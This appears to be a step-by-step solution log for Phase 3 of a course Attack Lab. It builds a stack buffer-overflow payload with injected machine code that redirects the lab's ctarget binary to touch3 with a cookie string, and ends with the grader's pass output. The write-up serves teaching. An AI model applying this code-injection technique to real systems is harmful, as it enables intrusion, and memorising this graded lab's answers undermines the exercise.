Attack Lab: Phase 3

Run

$ gdb ctarget --tui
...
(gdb) break getbuf
Breakpoint 1 at 0x401b28: file buf.c, line 12.
(gdb) run -q
Starting program: /home/stu2020012872/3-lab-3-attacklab/target97/ctarget -q

Breakpoint 1, getbuf () at buf.c:12
(gdb) info registers rsp
rsp            0x55668cc0       0x55668cc0

Run

objdump --disassemble ctarget > ctarget.asm

Read File ctarget.asm

...
0000000000401b28 <getbuf>:
  401b28:	48 83 ec 28          	sub    $0x28,%rsp
...
0000000000401c78 <touch3>:
...

Write File phase-3-inject.s

movq $0x55668cc8, %rdi
pushq $0x0000000000401c78
ret

Run

gcc -c phase-3-inject.s
objdump --disassemble phase-3-inject.o > phase-3-inject.asm

Read File phase-3-inject.asm

...
0000000000000000 <.text>:
   0:	48 c7 c7 c8 8c 66 55 	mov    $0x55668cc8,%rdi
   7:	68 78 1c 40 00       	pushq  $0x401c78
   c:	c3                   	retq

Read File cookie.txt

0x3a9a6c2f

Convert Cookie to String

The string should end with a \0.

33 61 39 61 36 63 32 66 00

Write File phase-3.txt

Place the string in the parent frame of getbuf, that is, test stack frames.

48 c7 c7 c8 8c 66 55
68 78 1c 40 00
c3
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
98 8c 66 55 00 00 00 00
33 61 39 61 36 63 32 66 00

Run

./hex2raw < phase-3.txt > phase-3.in
./ctarget -i phase-3.in

Terminal Output

Cookie: 0x3a9a6c2f
Touch3!: You called touch3("3a9a6c2f")
Valid solution for level 3 with target ctarget
PASS: Sent exploit string to server to be validated.
NICE JOB!